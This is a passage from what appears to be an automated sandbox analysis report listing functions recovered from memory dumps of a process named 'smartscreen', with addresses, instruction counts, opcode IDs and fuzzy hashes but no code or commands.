                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: 3580c29ad3ccb5f3a0262292cb9573ff8a19a8320590946b1769814dce3b624d
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 3CF08230A0960A4BF7A09688C4A17E97394EF88310F1242B9E94E977E2DE3C6E81C745
                                                          Function 00007FFD9B7810C0 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d2a8d3896e4c1ebeb22bc4ff2692ff83bcc4e4c7d52a9bf289d4dad8314b9f63
                                                          • Instruction ID: a59a9af8c02984f3556a7e07db7dbdfd9afb7d04dd254c83fd523380afe4d219
                                                          • Opcode Fuzzy Hash: d2a8d3896e4c1ebeb22bc4ff2692ff83bcc4e4c7d52a9bf289d4dad8314b9f63
                                                          • Instruction Fuzzy Hash: 93E02625B0CD4D0BEB6CBA742CB25B07281DB85315B0502BAD02AC26DACC1D6C814281
                                                          Function 00007FFD9B7B86B9 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 55141527670b046f566bdb871944918f79b28a82a1c50196072b5f6c170413b2
                                                          • Instruction ID: 7f0d68ebbcf9084e949854404a3108f7b3bccea3f63ffe949208e2b1c1d3b0f7
                                                          • Opcode Fuzzy Hash: 55141527670b046f566bdb871944918f79b28a82a1c50196072b5f6c170413b2
                                                          • Instruction Fuzzy Hash: 3AE04F30A1AB844FCB0A9B2888699503BB0EF6A21178A40FBD049CF1B3D62DD848C752
                                                          Function 00007FFD9B7BAD29 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b79a552b90b59465f7ff06454a26e0aa72268cc764af4547ecf014a0eb0c73aa
                                                          • Instruction ID: 27a4b6a9612e7086a32b4fa9531253c19214d81df5de44a211efff0c778b8f0f
                                                          • Opcode Fuzzy Hash: b79a552b90b59465f7ff06454a26e0aa72268cc764af4547ecf014a0eb0c73aa
                                                          • Instruction Fuzzy Hash: 51E04F30A597844FC70A9B2888699503FB1EF6A21178A41EBC049CF1B3D629D848C711
                                                          Function 00007FFD9B7B7E29 Relevance: .0, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f00c253490fe6a19c2cac48d5334954267d0c2c6757c5b207509f83e243940c
                                                          • Instruction ID: b5ee304c3b3a8a7b1b0ef0b18d7e25cc9678c815e8271e514d73b92a32e2d535
                                                          • Opcode Fuzzy Hash: 8f00c253490fe6a19c2cac48d5334954267d0c2c6757c5b207509f83e243940c
                                                          • Instruction Fuzzy Hash: D4E04F21A4A7C00FC30A663488658543BB0DF6722174A01DBD045CF5B3D51DDC4DC711
                                                          Function 00007FFD9B7BDE68 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cadf9ad8291831178528df8c8e09b5a05e854417b4fe406c97835808a5241fba
                                                          • Instruction ID: 448e3c4370415bcecd844f8d7e95433404f18799015123d6f95f6db0c30198b7
                                                          • Opcode Fuzzy Hash: cadf9ad8291831178528df8c8e09b5a05e854417b4fe406c97835808a5241fba
                                                          • Instruction Fuzzy Hash: C8E04F30A897804FC70A9B3488698503FB1EF5B21174A80EFC045CF1B3D62D9849C712
                                                          Function 00007FFD9B79BE4D Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b790000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction ID: 8f74bb5f30c50f95bfc21b9aef66cb80f2159653930a1a69060b5106a51312ae
                                                          • Opcode Fuzzy Hash: b06007b2d15cb476c392cbbefce1be8c6ad90f5c39c0958316e5efeaf6a74b02
                                                          • Instruction Fuzzy Hash: 3EE01A32B09B1A4BF725AA90C4A4AB93245AB55710F064675D849D72F2DE28AA005680
                                                          Function 00007FFD9B7BA9F0 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B7BA960 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B7B20F0 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                          • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                          • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                          Function 00007FFD9B7B9439 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4ce86ea455c08e85559c691b3572baab5604a0a3d353621a6ae87bee585f09c6
                                                          • Instruction ID: da1f22307a499d8120b8489865e920ddf0d798014792317b40af70a2e287ee07
                                                          • Opcode Fuzzy Hash: 4ce86ea455c08e85559c691b3572baab5604a0a3d353621a6ae87bee585f09c6
                                                          • Instruction Fuzzy Hash: 5DE0123050A7844FC70A9F24C8A99903FB0EF2A21178A01EBD409CF5B3D62D9C49C751
                                                          Function 00007FFD9B7BDDE9 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                          • Instruction ID: b61f7eb9dca03e7cd502340bf295fb8d2940d645f2755d22fd82f6235e1284ef
                                                          • Opcode Fuzzy Hash: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                          • Instruction Fuzzy Hash: D8E01A2194F7D04FC70B9B3488688407F60AE1721078A45EAC085CF1B3E6198849C701
                                                          Function 00007FFD9B780B95 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction ID: 9c82c6be84d2680ad6f18f3ecb797aa6ae1abb0a02db453558324f7f2cb2e967
                                                          • Opcode Fuzzy Hash: 01128ebb3b7ec0b5151aa04a1c0580f2a8b486cc2299b51aaf45d3f3ed769e8f
                                                          • Instruction Fuzzy Hash: BFD0A930629A4E8FDA01B778C88A8247BA0FB0F211FCA10E1E008C71B2D61888A98700
                                                          Function 00007FFD9B7B83C8 Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d30ea7179b514e9cfafe85d2eea18eeb343e66f8c25f7e22783170635c70cb31
                                                          • Instruction ID: 8c0714b7aec35228e9d28cfa6d40a5fa20af72e4e97e870dd4864e61bb843e98
                                                          • Opcode Fuzzy Hash: d30ea7179b514e9cfafe85d2eea18eeb343e66f8c25f7e22783170635c70cb31
                                                          • Instruction Fuzzy Hash: 22D0A930B209084F8B0CB62C885882033D0EB6920278500A8D00ACB2B1ED2ADC88CB40
                                                          Function 00007FFD9B7B25D0 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                          • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                          • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                          Function 00007FFD9B7BBC78 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction ID: 24b1562bae84a4750997b1fdfc008f059e83b8869f503f70b39b029d13d23473
                                                          • Opcode Fuzzy Hash: 28d8733998a56753eaf3714d8c7a96fd320e2d6c2c6b6debb6d51310e0a97017
                                                          • Instruction Fuzzy Hash: 23D01234B519044FC71CA63888AA8747391EB6A216B9541B9D00AC72B1D96AED89CB81
                                                          Function 00007FFD9B7B7480 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction ID: 893e7ae41a6e71b48f7fb7b68c4b1be8b100a4fd000b2f078578c5dc7d32cdbe
                                                          • Opcode Fuzzy Hash: 7df4b55b0e60c0065be6ba464c6f623789a2d433318d44673c065b6b7d7e463f
                                                          • Instruction Fuzzy Hash: 63D01234B519044FC71CA638889A8747391EB6A21679551B9D00ACB2B1D96AED89CB41
                                                          Function 00007FFD9B7BDE78 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7b1000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6735a18f6df44dd29e5d21ff131476deac446311d60aa364e24988e62212ed35
                                                          • Instruction ID: f8b9915a146923873a969e828fa56011ceec0679c240ba3f0f9b7b99074bdf29
                                                          • Opcode Fuzzy Hash: 6735a18f6df44dd29e5d21ff131476deac446311d60aa364e24988e62212ed35
                                                          • Instruction Fuzzy Hash: F3D0A77594F5844FCF5A9735C8A8C507F50DF6B21034540ECC00A8F1B3D925CD49CB01
                                                          Function 00007FFD9B7A6E10 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B7A4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A4000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b7a4000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction ID: 20696947b82046168e85e3d640ef3b2f7b31328008baa485ab62af10487f1ce5
                                                          • Opcode Fuzzy Hash: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction Fuzzy Hash: A4C04C11A5AD2E46E6B872B934921E8B0409B4D221B461EB9E41CD91A6DC5D5E9102C5
                                                          Function 00007FFD9B7806AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: fb6a0e738759d443d483a3f8091ac49afb5a4f69f5465b0c9cfa28ac93282ba7
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: BEC00205F5BF5F01E46531AA58A60ADB2405FC4A26FE31273D50D801B1986E22D64196
                                                          Function 00007FFD9B7812D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 6013e772606c756823daabf6aee8ea91ea850f676bf1bbcf8e8749d80422b918
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: E1C08C30511D0E8FC908EB28C88480433A0FB19201BC20090E009C7170E229DCC2C740
                                                          Function 00007FFD9B781CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df52e2bcef9593eebfc6b570cb4b88f0cf13b9f24b2006d8815a3578033bc70d
                                                          • Instruction ID: 8f37100563575cf1bc577b924c2efb27c75f4ce909a465bde4596a0a14a92141
                                                          • Opcode Fuzzy Hash: df52e2bcef9593eebfc6b570cb4b88f0cf13b9f24b2006d8815a3578033bc70d
                                                          • Instruction Fuzzy Hash: 07C08C00F18C1E8BF3263288043067D00425B84304F904270E00F86BCECC1C2E02028B
                                                          Function 00007FFD9B7806D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 77cc721939f5cfd92a63225049206c4e660550797244399cb29935e19bc662a5
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 2EB01200D57E0F00E42431FA0CD20A570405F44211FC30271D40C801B1985E12D50282
                                                          Function 00007FFD9B782279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: 54eb439320f8a02e73232ac22f73b763ce7037b18a156cde748ab09203aea64f
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: 62B09222E1AB1D42E32496A084A02FA32520F48311FABC6B2900F264E18C382B859680

                                                          Non-executed Functions

                                                          Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001B.00000002.1875586030.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_27_2_7ffd9b780000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: c9$!k9$"s9$#{9
                                                          • API String ID: 0-1692736845
                                                          • Opcode ID: 77d223a0528defc6a658e0d448f9167d13dfc1d48850c5f1d4df1b48ca8182b6
                                                          • Instruction ID: 6e2696d2ce131cfcd50b818bd7740e4785d4c93133ab7c373deed7cb11ac3e9b
                                                          • Opcode Fuzzy Hash: 77d223a0528defc6a658e0d448f9167d13dfc1d48850c5f1d4df1b48ca8182b6
                                                          • Instruction Fuzzy Hash: E941B00BB8E56A4DE31933FD75619FC6B468FA1335B0843F7F06E890D74E18608186E5

                                                          Executed Functions

                                                          Function 00007FFD9B760D47 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5[_H
                                                          • API String ID: 0-3279724263
                                                          • Opcode ID: 310840cfa6084e00549986b04d0792c0668f5cfb0a3ce32f5c84dad1638f5339
                                                          • Instruction ID: 88ca8237a6fd55c30579194ca106c28146b05c53d68dacd7f2ad80cbad82006d
                                                          • Opcode Fuzzy Hash: 310840cfa6084e00549986b04d0792c0668f5cfb0a3ce32f5c84dad1638f5339
                                                          • Instruction Fuzzy Hash: 0791F3B5A19A9D8FEB59DF6888797A87FE1FB95300F4001BBD049C72E6EE781814C701
                                                          Function 00007FFD9B791998 Relevance: .4, Instructions: 438COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 911eb64e75c7de47024fae8dec8b52275339a6101a32f3bb6a45ab5fcb044c71
                                                          • Instruction ID: f61e2398aa7a7d1b4eb05635db38817e3573b124f49e635525609ff286a63cf4
                                                          • Opcode Fuzzy Hash: 911eb64e75c7de47024fae8dec8b52275339a6101a32f3bb6a45ab5fcb044c71
                                                          • Instruction Fuzzy Hash: 43B1BC35A2E75E07E32C49594C930B57395EB92306B29837CCDEB838E7DD18B52342C1
                                                          Function 00007FFD9B760940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dN_H
                                                          • API String ID: 0-2854262715
                                                          • Opcode ID: 176aa5b4676235bc4ab59b01f392f2ac68e77c369c9b73448d46bb7944481ba1
                                                          • Instruction ID: 55a5a717f35bf3c5fbe28f951ca1ba6e5798e40ee798a2a8d26eadc50a16bcfb
                                                          • Opcode Fuzzy Hash: 176aa5b4676235bc4ab59b01f392f2ac68e77c369c9b73448d46bb7944481ba1
                                                          • Instruction Fuzzy Hash: 8251E771B1CB088FD75CDA5CA89667577E1EB99720F14026EE489C32A2DE35BC42C783
                                                          Function 00007FFD9B76108D Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b760000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V
                                                          • API String ID: 0-1342839628
                                                          • Opcode ID: 4e6496f64f42885405f4db13649c2755b6f97f01980fc5e3dcd63997c3dae0ff
                                                          • Instruction ID: 1f0f1327a7f76eb37d78ca9088e0e5e244f3761c4e690fc2808b12311b7869db
                                                          • Opcode Fuzzy Hash: 4e6496f64f42885405f4db13649c2755b6f97f01980fc5e3dcd63997c3dae0ff
                                                          • Instruction Fuzzy Hash: 9101262098E6C60FDB1947B04C75AF63F918F8721070A02FBE089CB4F3C84D198683A2
                                                          Function 00007FFD9B791311 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: f12c0a075ec27cfbf5fef80b8620e91a67aa2f93c00d3bf6be23cb0d9f5c98cd
                                                          • Instruction ID: 183ec4e01b1e37abc7825f8b17b69fe653e45be46e7cbd0f7b237246f925c800
                                                          • Opcode Fuzzy Hash: f12c0a075ec27cfbf5fef80b8620e91a67aa2f93c00d3bf6be23cb0d9f5c98cd
                                                          • Instruction Fuzzy Hash: F301AD60A4F3C51FDB13A7794829414BFB0EE2720034A02EFC086CF5B3D91D498AC702
                                                          Function 00007FFD9B79A949 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000001C.00000002.1874389719.00007FFD9B791000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B791000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_28_2_7ffd9b791000_smartscreen.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M
                                                          • API String ID: 0-3664761504
                                                          • Opcode ID: 2c527e1d9c0e6d52423112981ac464d116d1382743bfd84b1ed4f50b27f9ea42
                                                          • Instruction ID: 50b7503b6ec1246df5541ed247b2786542c01a9767911684e283345212366f3f
                                                          • Opcode Fuzzy Hash: 2c527e1d9c0e6d52423112981ac464d116d1382743bfd84b1ed4f50b27f9ea42
